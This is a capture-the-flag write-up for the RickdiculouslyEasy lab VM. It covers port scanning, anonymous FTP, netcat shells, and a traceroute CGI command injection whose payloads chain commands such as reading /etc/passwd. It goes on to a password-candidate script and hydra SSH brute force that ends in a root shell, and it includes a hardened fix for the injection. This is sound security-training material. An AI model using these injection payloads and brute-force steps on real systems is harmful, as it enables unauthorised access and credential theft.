RickdiculouslyEasy

Setup

I used Ubuntu Server 18.04 as the guest OS of an attacking VM. I SSHed from the host OS into that VM and attacked the RickdiculouslyEasy VM from there.

It would be more convenient to attack the vulnerable VM directly from the host OS, but going through an intermediate VM seems safer: I could snapshot it and roll back if necessary, and my data on the host stayed separate from anything the vulnerable VM might corrupt. You can never be too careful.

IP

The RickdiculouslyEasy VM's IP was 192.168.56.101. A ping sweep over the host-only network finds the IPs of all local VMs:

nmap -v -sn 192.168.56.1/24

nmap

Ran nmap against 192.168.56.101 to find all open ports.

# -T4: faster timing template; -T5 is too aggressive and can miss ports
# -Pn: skip host discovery, treat the host as live
# -p-: all 65535 TCP ports
# -sV: probe the open ports to identify the service and version
$ sudo nmap -T4 -v -Pn -p- -sV 192.168.56.101

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http    Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown

ftp

nmap -sC (the default script set, here its ftp-anon script) showed that the FTP server accepts anonymous login without a password. Inside, I got the first flag: FLAG{Whoa this is unexpected} - 10 Points

cockpit

192.168.56.101:9090 gave FLAG {There is no Zeus, in your face!} - 10 Points. The Cockpit login page was broken, so there was nothing else to do here.

nc

Connecting to 192.168.56.101:13337 with nc printed FLAG:{TheyFoundMyBackDoorMorty}-10Points.

192.168.56.101:60000 printed a banner hinting that it is a shell. Connecting with nc dropped me into that shell, and there was a flag file inside: FLAG{Flip the pickle Morty!} - 10 Points.

:80

192.168.56.101:80 was just a normal page. 192.168.56.101:80/robots.txt gave links to 3 other pages; the most important of them is 192.168.56.101:80/cgi-bin/tracertool.cgi. A quick test showed that Linux commands can be injected into the CGI script: entering 192.168.56.101; ls -al as the target runs the traceroute and then lists all files in the current directory.

Some exploring with ls -al, cd and pwd led me to another flag file: FLAG{Yeah d- just don't do it.} - 10 Points. Note that each request runs in a fresh shell, so a cd only has effect within the same injected command string (e.g. 192.168.56.101; cd /some/dir; ls -al).
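The injection above works because the CGI hands the form field to a shell. As an added example (not the challenge's tracertool.cgi, whose source is not on this page; the vulnerable pattern is my assumption about how such scripts are usually written), here is the broken pattern beside a hardened version in Python:

```python
"""Why `192.168.56.101; ls -al` works against a traceroute-style CGI, and what
the fixed version looks like. This is an added example, not the challenge's
tracertool.cgi (its source is not shown in the writeup); the vulnerable
pattern is an assumption about how such scripts are commonly written."""
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# each label 1-63 chars, not starting or ending with '-', 253 chars total.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(target):
    """The broken pattern: the form field is pasted into a shell command line.
    Handed to sh -c (or os.system / popen), everything after ';' runs as a
    second command, which is exactly what the writeup exploits."""
    return "traceroute " + target


def shell_quoted_command(target):
    """Partial fix: if a shell is unavoidable, shlex.quote turns the whole
    field into one literal argument, so ';', '|' and '$(...)' lose their meaning."""
    return "traceroute " + shlex.quote(target)


def is_valid_target(target):
    """Allow-list: a literal IPv4/IPv6 address or an RFC 1123 hostname.
    Everything else, including anything with spaces or shell metacharacters,
    is rejected outright rather than escaped."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(target) is not None


def safe_argv(target):
    """Proper fix: validate, then build an argv list so no shell ever parses
    the user's input. The allow-list also guarantees the target cannot start
    with '-', so it cannot be mistaken for a traceroute option."""
    if not is_valid_target(target):
        raise ValueError("refusing target %r" % (target,))
    return ["traceroute", target]


def run_traceroute(target):
    """Execute the hardened command without a shell and return its output."""
    result = subprocess.run(safe_argv(target), capture_output=True, text=True, timeout=60)
    return result.stdout


if __name__ == "__main__":
    evil = "192.168.56.101; ls -al"
    print("vulnerable :", vulnerable_command(evil))
    print("quoted     :", shell_quoted_command(evil))
    print("argv       :", safe_argv("192.168.56.101"))
    try:
        safe_argv(evil)
    except ValueError as err:
        print("rejected   :", err)
```

Quoting alone is the weaker fix: it stops the shell from splitting the field, but the allow-list plus argv approach means there is no shell to fool in the first place, and a rejected request leaves an obvious error instead of silently running something.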

I also found passwords.html, which hid the password winter in an HTML comment.

Injecting 192.168.56.101; ls -al /etc; more /etc/passwd gave the list of all users.
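The /etc/passwd listing is only useful as input to the next step once it is reduced to the accounts that can actually log in. As an added example (not part of the original writeup), the Python below parses a passwd dump and emits the names to try the recovered password against, in the one-per-line format hydra -L expects; the sample file is constructed to resemble a Fedora box and is not the VM's actual /etc/passwd.

```python
"""Turn an /etc/passwd dump pulled through the CGI injection into a list of
accounts worth trying a recovered password against. Added example, not part of
the original writeup; the sample file below is constructed to look like a
Fedora host (the target runs Apache on Fedora) and is not the VM's real file."""

# Shells that cannot be logged into; accounts using them are skipped.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}

# Constructed sample, not the real /etc/passwd of the VM.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:991:987:User for cockpit-ws:/:/sbin/nologin
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
"""


def parse_passwd(text):
    """Yield (name, uid, shell) for each well-formed passwd line.
    Lines that do not have the seven colon-separated fields (HTML from the
    CGI response, pager prompts, blank lines) are skipped."""
    for line in text.splitlines():
        fields = line.rstrip("\n").split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        try:
            yield name, int(uid), shell
        except ValueError:
            continue


def login_accounts(text, min_uid=1000):
    """Accounts with an interactive shell: root plus every uid >= min_uid
    (the range Fedora hands to human users). File order is kept so the
    resulting list is stable across runs."""
    return [name for name, uid, shell in parse_passwd(text)
            if shell not in NOLOGIN_SHELLS and (uid == 0 or uid >= min_uid)]


def write_userlist(text, path):
    """Write one name per line, the format hydra -L / -L users.txt expects,
    and return the names written."""
    users = login_accounts(text)
    with open(path, "w") as fh:
        fh.write("\n".join(users) + "\n")
    return users


if __name__ == "__main__":
    for name in login_accounts(SAMPLE_PASSWD):
        print(name)
```

Feeding the output to hydra -L instead of guessing one user at a time turns the "try winter against every user" step into a single run.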

ssh

nmap could not identify the service on port 22 (ssh?), so port 22 looks like a decoy, while port 22222 is the real OpenSSH service.

Tried the password winter against every user from /etc/passwd over port 22222; it was Summer's. Summer's home directory held another flag: FLAG{Get off the high road Summer!} - 10 Points

/home/Morty held two files: an image and a password-protected zip. Opening the image in vim showed the zip password, Meeseek, stored as plain text inside the image file. unzip -c journal.txt.zip printed the journal to stdout and gave FLAG: {131333} - 20 Points

In /home/RickSanchez there is a binary, safe, that is readable by everyone but executable only by RickSanchez. Because the file is readable, cp safe /home/Summer/ produces a copy owned by Summer, and Summer can run her own copy:

$ ./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Rick's password hints:
 (This is in case I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old band's name.

brute force

I created a bash script to generate every candidate that matches the hints, in the order given (one uppercase letter, one digit, one word of the band name "The Flesh Curtains"), which is 26 * 10 * 3 = 780 passwords:

#!/bin/bash
# Generate all candidates matching Rick's hints, in order:
# one uppercase letter, one digit, then one word of the band name.
set -euo pipefail

band=("The" "Flesh" "Curtains")
out=rickpass.txt
: > "$out"    # truncate first so re-running does not append duplicates

for i in {A..Z}; do
    for j in {0..9}; do
        for k in "${band[@]}"; do
            printf '%s\n' "${i}${j}${k}" >> "$out"
        done
    done
done

echo "wrote $(wc -l < "$out") candidates to $out"

Then I used hydra to brute-force RickSanchez's password over the real SSH port:

hydra -l RickSanchez -P rickpass.txt ssh://192.168.56.101:22222

With 780 candidates this finishes quickly. If sshd starts refusing connections, lower the parallelism with -t 4, which hydra itself warns you to do for SSH targets.

The password was P7Curtains.

The safe's hint that sudo is "wheely good" was literal: sudo -i gave a root shell, and /root held the last flag. FLAG: {Ionic Defibrillator} - 30 points